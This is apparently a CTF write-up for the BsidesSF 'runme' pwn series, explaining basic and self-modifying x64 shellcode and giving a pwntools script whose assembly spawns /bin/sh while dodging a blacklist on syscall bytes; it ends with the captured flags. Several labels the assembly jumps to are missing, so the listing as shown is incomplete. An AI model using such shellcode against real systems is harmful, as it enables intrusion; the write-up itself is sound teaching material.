
pwn notes from an exploit dev wannabe

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BsidesSF CTF: runme 1,2,3 [pwn]

tl;dr: basic shellcode for 1 & 2, self-modifying shellcode for 3

These series involved challenges revolving around the concept of shellcode. For the easier challenges (1, 2), we only had to provide a simple x64 shellcode which spawns a shell (1) and does not have null bytes in it (2).

What made the series interesting was the third challenge which blacklisted the bytes needed to make the int 0x80 and syscall instructions. To solve this, I ported an existing self-modifying shellcode to an x64 version and did some slight adjustments on the calculations that are made. In summary, the shellcode finds a target sequence of bytes in our payload and performs some calculation in order to get the needed bytes, therefore bypassing the blacklist.

I got stumped for a while despite forming a proper execve shellcode, but realized what I was doing wrong. Note to self, execve requires a pointer to the /bin/sh string in memory instead of simply the contents in a register.

from pwn import *

#p = process('./runme3')
#p = remote("runme-bc63cb99.challenges.bsidessf.net", 1337)
#p = remote("runme2-91ab7154.challenges.bsidessf.net", 1337)
p = remote("runme3-3f8ecff9.challenges.bsidessf.net", 1337)

breakpoints = ['break *main + 438']
#gdb.attach(p, gdbscript = '\n'.join(breakpoints))

context.arch = 'amd64'
#: for runme 1 & 2

#: for runme 3
self_modifying_shellcode = asm('''

		jmp _fuckaround_and_findout

		pop rdx
		mov rsi, rdx

		mov rax, [rdx]
		cmpw ax, 0x3713
		jne _not_target
		subw ax, 0x3204
		mov [rdx], rax
		inc dl
		cmp eax, 0x41414141
		jne _loopmakesyscall
		jmp rsi

		call _scanbytes

		xor rdx, rdx
		xor rdi, rdi
		xor rsi, rsi
		xor rax, rax
		push rax
		movabs rbx, 0x68732f2f6e69622f
		push rbx
		lea rdi, [rsp]
		mov al, 0x3b
		.ascii "\x13\x37"
		.ascii "AAAAAAAA"


#: CTF{welcome_to_shellcode}
#: CTF{welcome_to_shellcode_again}
#: CTF{welcome_to_shellcode_once_more}